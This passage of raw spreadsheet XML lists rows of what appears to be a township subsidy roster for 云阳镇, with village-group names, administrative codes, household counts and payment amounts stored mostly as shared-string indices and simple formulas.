        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1354" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1354" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1355" customHeight="1" spans="1:11">
      <c r="A1355" s="23" t="s">
        <v>3674</v>
      </c>
      <c r="B1355" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1355" s="24" t="s">
        <v>3675</v>
      </c>
      <c r="D1355" s="24" t="s">
        <v>3676</v>
      </c>
      <c r="E1355" s="24" t="s">
        <v>3637</v>
      </c>
      <c r="F1355" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1355" s="24">
        <v>2</v>
      </c>
      <c r="H1355" s="25">
        <v>325</v>
      </c>
      <c r="I1355" s="24">
        <f t="shared" si="21"/>
        <v>650</v>
      </c>
      <c r="J1355" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1355" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1356" customHeight="1" spans="1:11">
      <c r="A1356" s="23" t="s">
        <v>3677</v>
      </c>
      <c r="B1356" s="24" t="str">
        <f>B1355</f>
        <v>云阳镇</v>
      </c>
      <c r="C1356" s="24" t="str">
        <f>C1355</f>
        <v>镇直（政府）</v>
      </c>
      <c r="D1356" s="23" t="s">
        <v>3678</v>
      </c>
      <c r="E1356" s="23" t="s">
        <v>3679</v>
      </c>
      <c r="F1356" s="24" t="str">
        <f>F1355</f>
        <v>4113210599</v>
      </c>
      <c r="G1356" s="24"/>
      <c r="H1356" s="24"/>
      <c r="I1356" s="24">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="J1356" s="24"/>
      <c r="K1356" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1357" customHeight="1" spans="1:11">
      <c r="A1357" s="23" t="s">
        <v>3680</v>
      </c>
      <c r="B1357" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1357" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1357" s="24" t="s">
        <v>3681</v>
      </c>
      <c r="E1357" s="24" t="s">
        <v>3682</v>
      </c>
      <c r="F1357" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1357" s="24">
        <v>1</v>
      </c>
      <c r="H1357" s="25">
        <v>365</v>
      </c>
      <c r="I1357" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1357" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1357" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1358" customHeight="1" spans="1:11">
      <c r="A1358" s="23" t="s">
        <v>3683</v>
      </c>
      <c r="B1358" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1358" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1358" s="24" t="s">
        <v>3684</v>
      </c>
      <c r="E1358" s="24" t="s">
        <v>3594</v>
      </c>
      <c r="F1358" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1358" s="24">
        <v>2</v>
      </c>
      <c r="H1358" s="25">
        <v>325</v>
      </c>
      <c r="I1358" s="24">
        <f t="shared" si="21"/>
        <v>650</v>
      </c>
      <c r="J1358" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1358" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1359" customHeight="1" spans="1:11">
      <c r="A1359" s="23" t="s">
        <v>3685</v>
      </c>
      <c r="B1359" s="24" t="str">
        <f>B1358</f>
        <v>云阳镇</v>
      </c>
      <c r="C1359" s="24" t="str">
        <f>C1358</f>
        <v>大关一组</v>
      </c>
      <c r="D1359" s="23" t="s">
        <v>3686</v>
      </c>
      <c r="E1359" s="23" t="s">
        <v>3687</v>
      </c>
      <c r="F1359" s="24" t="str">
        <f>F1358</f>
        <v>4113210522</v>
      </c>
      <c r="G1359" s="24"/>
      <c r="H1359" s="24"/>
      <c r="I1359" s="24">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="J1359" s="24"/>
      <c r="K1359" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1360" customHeight="1" spans="1:11">
      <c r="A1360" s="23" t="s">
        <v>3688</v>
      </c>
      <c r="B1360" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1360" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1360" s="24" t="s">
        <v>3689</v>
      </c>
      <c r="E1360" s="24" t="s">
        <v>3690</v>
      </c>
      <c r="F1360" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1360" s="24">
        <v>2</v>
      </c>
      <c r="H1360" s="25">
        <v>325</v>
      </c>
      <c r="I1360" s="24">
        <f t="shared" si="21"/>
        <v>650</v>
      </c>
      <c r="J1360" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1360" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1361" customHeight="1" spans="1:11">
      <c r="A1361" s="23" t="s">
        <v>3691</v>
      </c>
      <c r="B1361" s="24" t="str">
        <f>B1360</f>
        <v>云阳镇</v>
      </c>
      <c r="C1361" s="24" t="str">
        <f>C1360</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1361" s="23" t="s">
        <v>3692</v>
      </c>
      <c r="E1361" s="23" t="s">
        <v>3679</v>
      </c>
      <c r="F1361" s="24" t="str">
        <f>F1360</f>
        <v>4113210519</v>
      </c>
      <c r="G1361" s="24"/>
      <c r="H1361" s="24"/>
      <c r="I1361" s="24">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="J1361" s="24"/>
      <c r="K1361" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1362" customHeight="1" spans="1:11">
      <c r="A1362" s="23" t="s">
        <v>3693</v>
      </c>
      <c r="B1362" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1362" s="24" t="s">
        <v>3578</v>
      </c>
      <c r="D1362" s="24" t="s">
        <v>3694</v>
      </c>
      <c r="E1362" s="24" t="s">
        <v>3695</v>
      </c>
      <c r="F1362" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1362" s="24">
        <v>1</v>
      </c>
      <c r="H1362" s="25">
        <v>365</v>
      </c>
      <c r="I1362" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1362" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1362" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1363" customHeight="1" spans="1:11">
      <c r="A1363" s="23" t="s">
        <v>3696</v>
      </c>
      <c r="B1363" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1363" s="24" t="s">
        <v>3578</v>
      </c>
      <c r="D1363" s="24" t="s">
        <v>3697</v>
      </c>
      <c r="E1363" s="24" t="s">
        <v>3580</v>
      </c>
      <c r="F1363" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1363" s="24">
        <v>1</v>
      </c>
      <c r="H1363" s="25">
        <v>365</v>
      </c>
      <c r="I1363" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1363" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1363" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1364" customHeight="1" spans="1:11">
      <c r="A1364" s="23" t="s">
        <v>3698</v>
      </c>
      <c r="B1364" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1364" s="24" t="s">
        <v>3615</v>
      </c>
      <c r="D1364" s="24" t="s">
        <v>3699</v>
      </c>
      <c r="E1364" s="24" t="s">
        <v>3594</v>
      </c>
      <c r="F1364" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1364" s="24">
        <v>1</v>
      </c>
      <c r="H1364" s="25">
        <v>365</v>
      </c>
      <c r="I1364" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1364" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1364" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1365" customHeight="1" spans="1:11">
      <c r="A1365" s="23" t="s">
        <v>3700</v>
      </c>
      <c r="B1365" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1365" s="24" t="s">
        <v>3544</v>
      </c>
      <c r="D1365" s="24" t="s">
        <v>3701</v>
      </c>
      <c r="E1365" s="24" t="s">
        <v>2572</v>
      </c>
      <c r="F1365" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1365" s="24">
        <v>1</v>
      </c>
      <c r="H1365" s="25">
        <v>365</v>
      </c>
      <c r="I1365" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1365" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1365" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1366" customHeight="1" spans="1:11">
      <c r="A1366" s="23" t="s">
        <v>3702</v>
      </c>
      <c r="B1366" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1366" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1366" s="24" t="s">
        <v>3703</v>
      </c>
      <c r="E1366" s="24" t="s">
        <v>3704</v>
      </c>
      <c r="F1366" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1366" s="24">
        <v>2</v>
      </c>
      <c r="H1366" s="25">
        <v>325</v>
      </c>
      <c r="I1366" s="24">
        <f t="shared" si="21"/>
        <v>650</v>
      </c>
      <c r="J1366" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1366" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1367" customHeight="1" spans="1:11">
      <c r="A1367" s="23" t="s">
        <v>3705</v>
      </c>
      <c r="B1367" s="24" t="str">
        <f>B1366</f>
        <v>云阳镇</v>
      </c>
      <c r="C1367" s="24" t="str">
        <f>C1366</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1367" s="23" t="s">
        <v>3706</v>
      </c>
      <c r="E1367" s="23" t="s">
        <v>3707</v>
      </c>
      <c r="F1367" s="24" t="str">
        <f>F1366</f>
        <v>4113210519</v>
      </c>
      <c r="G1367" s="24"/>
      <c r="H1367" s="24"/>
      <c r="I1367" s="24">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="J1367" s="24"/>
      <c r="K1367" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1368" customHeight="1" spans="1:11">
      <c r="A1368" s="23" t="s">
        <v>3708</v>
      </c>
      <c r="B1368" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1368" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1368" s="24" t="s">
        <v>3709</v>
      </c>
      <c r="E1368" s="24" t="s">
        <v>3598</v>
      </c>
      <c r="F1368" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1368" s="24">
        <v>1</v>
      </c>
      <c r="H1368" s="25">
        <v>365</v>
      </c>
      <c r="I1368" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1368" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1368" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1369" customHeight="1" spans="1:11">
      <c r="A1369" s="23" t="s">
        <v>3710</v>
      </c>
      <c r="B1369" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1369" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1369" s="24" t="s">
        <v>3711</v>
      </c>
      <c r="E1369" s="24" t="s">
        <v>2552</v>
      </c>
      <c r="F1369" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1369" s="24">
        <v>1</v>
      </c>
      <c r="H1369" s="25">
        <v>365</v>
      </c>
      <c r="I1369" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1369" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1369" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1370" customHeight="1" spans="1:11">
      <c r="A1370" s="23" t="s">
        <v>3712</v>
      </c>
      <c r="B1370" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1370" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1370" s="24" t="s">
        <v>3713</v>
      </c>
      <c r="E1370" s="24" t="s">
        <v>3714</v>
      </c>
      <c r="F1370" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1370" s="24">
        <v>1</v>
      </c>
      <c r="H1370" s="25">
        <v>365</v>
      </c>
      <c r="I1370" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1370" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1370" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1371" customHeight="1" spans="1:11">
      <c r="A1371" s="23" t="s">
        <v>3715</v>
      </c>
      <c r="B1371" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1371" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1371" s="24" t="s">
        <v>3716</v>
      </c>
      <c r="E1371" s="24" t="s">
        <v>3707</v>
      </c>
      <c r="F1371" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1371" s="24">
        <v>1</v>
      </c>
      <c r="H1371" s="25">
        <v>365</v>
      </c>
      <c r="I1371" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1371" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1371" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1372" customHeight="1" spans="1:11">
      <c r="A1372" s="23" t="s">
        <v>3717</v>
      </c>
      <c r="B1372" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1372" s="24" t="s">
        <v>3544</v>
      </c>
      <c r="D1372" s="24" t="s">
        <v>3718</v>
      </c>
      <c r="E1372" s="24" t="s">
        <v>3719</v>
      </c>
      <c r="F1372" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1372" s="24">
        <v>1</v>
      </c>
      <c r="H1372" s="25">
        <v>365</v>
      </c>
      <c r="I1372" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1372" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1372" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1373" customHeight="1" spans="1:11">
      <c r="A1373" s="23" t="s">
        <v>3720</v>
      </c>
      <c r="B1373" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1373" s="24" t="s">
        <v>3721</v>
      </c>
      <c r="D1373" s="24" t="s">
        <v>3722</v>
      </c>
      <c r="E1373" s="24" t="s">
        <v>3598</v>
      </c>
      <c r="F1373" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1373" s="24">
        <v>1</v>
      </c>
      <c r="H1373" s="25">
        <v>365</v>
      </c>
      <c r="I1373" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1373" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1373" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1374" customHeight="1" spans="1:11">
      <c r="A1374" s="23" t="s">
        <v>3723</v>
      </c>
      <c r="B1374" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1374" s="24" t="s">
        <v>3639</v>
      </c>
      <c r="D1374" s="24" t="s">
        <v>3724</v>
      </c>
      <c r="E1374" s="24" t="s">
        <v>3641</v>
      </c>
      <c r="F1374" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1374" s="24">
        <v>1</v>
      </c>
      <c r="H1374" s="25">
        <v>365</v>
      </c>
      <c r="I1374" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1374" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1374" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1375" customHeight="1" spans="1:11">
      <c r="A1375" s="23" t="s">
        <v>3725</v>
      </c>
      <c r="B1375" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1375" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1375" s="24" t="s">
        <v>3726</v>
      </c>
      <c r="E1375" s="24" t="s">
        <v>3727</v>
      </c>
      <c r="F1375" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1375" s="24">
        <v>1</v>
      </c>
      <c r="H1375" s="25">
        <v>365</v>
      </c>
      <c r="I1375" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1375" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1375" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1376" customHeight="1" spans="1:11">
      <c r="A1376" s="23" t="s">
        <v>3728</v>
      </c>
      <c r="B1376" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1376" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1376" s="24" t="s">
        <v>3729</v>
      </c>
      <c r="E1376" s="24" t="s">
        <v>3730</v>
      </c>
      <c r="F1376" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1376" s="24">
        <v>1</v>
      </c>
      <c r="H1376" s="25">
        <v>365</v>
      </c>
      <c r="I1376" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1376" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1376" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1377" customHeight="1" spans="1:11">
      <c r="A1377" s="23" t="s">
        <v>3731</v>
      </c>
      <c r="B1377" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1377" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1377" s="24" t="s">
        <v>3732</v>
      </c>
      <c r="E1377" s="24" t="s">
        <v>3733</v>
      </c>
      <c r="F1377" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1377" s="24">
        <v>1</v>
      </c>
      <c r="H1377" s="25">
        <v>365</v>
      </c>
      <c r="I1377" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1377" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1377" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1378" customHeight="1" spans="1:11">
      <c r="A1378" s="23" t="s">
        <v>3734</v>
      </c>
      <c r="B1378" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1378" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1378" s="24" t="s">
        <v>3735</v>
      </c>
      <c r="E1378" s="24" t="s">
        <v>3641</v>
      </c>
      <c r="F1378" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1378" s="24">
        <v>1</v>
      </c>
      <c r="H1378" s="25">
        <v>365</v>
      </c>
      <c r="I1378" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1378" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1378" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1379" customHeight="1" spans="1:11">
      <c r="A1379" s="23" t="s">
        <v>3736</v>
      </c>
      <c r="B1379" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1379" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1379" s="24" t="s">
        <v>3737</v>
      </c>
      <c r="E1379" s="24" t="s">
        <v>3738</v>
      </c>
      <c r="F1379" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1379" s="24">
        <v>1</v>
      </c>
      <c r="H1379" s="25">
        <v>365</v>
      </c>
      <c r="I1379" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1379" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1379" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1380" customHeight="1" spans="1:11">
      <c r="A1380" s="23" t="s">
        <v>3739</v>
      </c>
      <c r="B1380" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1380" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1380" s="24" t="s">
        <v>3740</v>
      </c>
      <c r="E1380" s="24" t="s">
        <v>3607</v>
      </c>
      <c r="F1380" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1380" s="24">
        <v>1</v>
      </c>
      <c r="H1380" s="25">
        <v>365</v>
      </c>
      <c r="I1380" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1380" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1380" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1381" customHeight="1" spans="1:11">
      <c r="A1381" s="23" t="s">
        <v>3741</v>
      </c>
      <c r="B1381" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1381" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1381" s="24" t="s">
        <v>3742</v>
      </c>
      <c r="E1381" s="24" t="s">
        <v>3743</v>
      </c>
      <c r="F1381" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1381" s="24">
        <v>1</v>
      </c>
      <c r="H1381" s="25">
        <v>365</v>
      </c>
      <c r="I1381" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1381" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1381" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1382" customHeight="1" spans="1:11">
      <c r="A1382" s="23" t="s">
        <v>3744</v>
      </c>
      <c r="B1382" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1382" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1382" s="24" t="s">
        <v>3745</v>
      </c>
      <c r="E1382" s="24" t="s">
        <v>3730</v>
      </c>
      <c r="F1382" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1382" s="24">
        <v>2</v>
      </c>
      <c r="H1382" s="25">
        <v>325</v>
      </c>
      <c r="I1382" s="24">
        <f t="shared" si="21"/>
        <v>650</v>
      </c>
      <c r="J1382" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1382" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1383" customHeight="1" spans="1:11">
      <c r="A1383" s="23" t="s">
        <v>3746</v>
      </c>
      <c r="B1383" s="24" t="str">
        <f>B1382</f>
        <v>云阳镇</v>
      </c>
      <c r="C1383" s="24" t="str">
        <f>C1382</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1383" s="23" t="s">
        <v>3747</v>
      </c>
      <c r="E1383" s="23" t="s">
        <v>3637</v>
      </c>
      <c r="F1383" s="24" t="str">
        <f>F1382</f>
        <v>4113210519</v>
      </c>
      <c r="G1383" s="24"/>
      <c r="H1383" s="24"/>
      <c r="I1383" s="24">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="J1383" s="24"/>
      <c r="K1383" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1384" customHeight="1" spans="1:11">
      <c r="A1384" s="23" t="s">
        <v>3748</v>
      </c>
      <c r="B1384" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1384" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1384" s="24" t="s">
        <v>3749</v>
      </c>
      <c r="E1384" s="24" t="s">
        <v>3580</v>
      </c>
      <c r="F1384" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1384" s="24">
        <v>1</v>
      </c>
      <c r="H1384" s="25">
        <v>365</v>
      </c>
      <c r="I1384" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1384" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1384" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1385" customHeight="1" spans="1:11">
      <c r="A1385" s="23" t="s">
        <v>3750</v>
      </c>
      <c r="B1385" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1385" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1385" s="24" t="s">
        <v>3751</v>
      </c>
      <c r="E1385" s="24" t="s">
        <v>3752</v>
      </c>
      <c r="F1385" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1385" s="24">
        <v>1</v>
      </c>
      <c r="H1385" s="25">
        <v>365</v>
      </c>
      <c r="I1385" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1385" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1385" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1386" customHeight="1" spans="1:11">
      <c r="A1386" s="23" t="s">
        <v>3753</v>
      </c>
      <c r="B1386" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1386" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1386" s="24" t="s">
        <v>3754</v>
      </c>
      <c r="E1386" s="24" t="s">
        <v>3598</v>
      </c>
      <c r="F1386" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1386" s="24">
        <v>1</v>
      </c>
      <c r="H1386" s="25">
        <v>365</v>
      </c>
      <c r="I1386" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1386" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1386" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1387" customHeight="1" spans="1:11">
      <c r="A1387" s="23" t="s">
        <v>3755</v>
      </c>
      <c r="B1387" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1387" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1387" s="24" t="s">
        <v>3756</v>
      </c>
      <c r="E1387" s="24" t="s">
        <v>3733</v>
      </c>
      <c r="F1387" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1387" s="24">
        <v>1</v>
      </c>
      <c r="H1387" s="25">
        <v>365</v>
      </c>
      <c r="I1387" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1387" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1387" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1388" customHeight="1" spans="1:11">
      <c r="A1388" s="23" t="s">
        <v>3757</v>
      </c>
      <c r="B1388" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1388" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1388" s="24" t="s">
        <v>3758</v>
      </c>
      <c r="E1388" s="24" t="s">
        <v>3759</v>
      </c>
      <c r="F1388" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1388" s="24">
        <v>2</v>
      </c>
      <c r="H1388" s="25">
        <v>325</v>
      </c>
      <c r="I1388" s="24">
        <f t="shared" si="21"/>
        <v>650</v>
      </c>
      <c r="J1388" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1388" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1389" customHeight="1" spans="1:11">
      <c r="A1389" s="23" t="s">
        <v>3760</v>
      </c>
      <c r="B1389" s="24" t="str">
        <f>B1388</f>
        <v>云阳镇</v>
      </c>
      <c r="C1389" s="24" t="str">
        <f>C1388</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1389" s="23" t="s">
        <v>3761</v>
      </c>
      <c r="E1389" s="23" t="s">
        <v>3762</v>
      </c>
      <c r="F1389" s="24" t="str">
        <f>F1388</f>
        <v>4113210519</v>
      </c>
      <c r="G1389" s="24"/>
      <c r="H1389" s="24"/>
      <c r="I1389" s="24">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="J1389" s="24"/>
      <c r="K1389" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1390" customHeight="1" spans="1:11">
      <c r="A1390" s="23" t="s">
        <v>3763</v>
      </c>
      <c r="B1390" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1390" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1390" s="24" t="s">
        <v>3764</v>
      </c>
      <c r="E1390" s="24" t="s">
        <v>3644</v>
      </c>
      <c r="F1390" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1390" s="24">
        <v>1</v>
      </c>
      <c r="H1390" s="25">
        <v>365</v>
      </c>
      <c r="I1390" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1390" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1390" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1391" customHeight="1" spans="1:11">
      <c r="A1391" s="23" t="s">
        <v>3765</v>
      </c>
      <c r="B1391" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1391" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1391" s="24" t="s">
        <v>3766</v>
      </c>
      <c r="E1391" s="24" t="s">
        <v>3767</v>
      </c>
      <c r="F1391" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1391" s="24">
        <v>1</v>
      </c>
      <c r="H1391" s="25">
        <v>365</v>
      </c>
      <c r="I1391" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1391" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1391" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1392" customHeight="1" spans="1:11">
      <c r="A1392" s="23" t="s">
        <v>3768</v>
      </c>
      <c r="B1392" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1392" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1392" s="24" t="s">
        <v>3769</v>
      </c>
      <c r="E1392" s="24" t="s">
        <v>3770</v>
      </c>
      <c r="F1392" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1392" s="24">
        <v>1</v>
      </c>
      <c r="H1392" s="25">
        <v>365</v>
      </c>
      <c r="I1392" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1392" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1392" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1393" customHeight="1" spans="1:11">
      <c r="A1393" s="23" t="s">
        <v>3771</v>
      </c>
      <c r="B1393" s="24" t="s">
        <v>3543</v>
      </c>
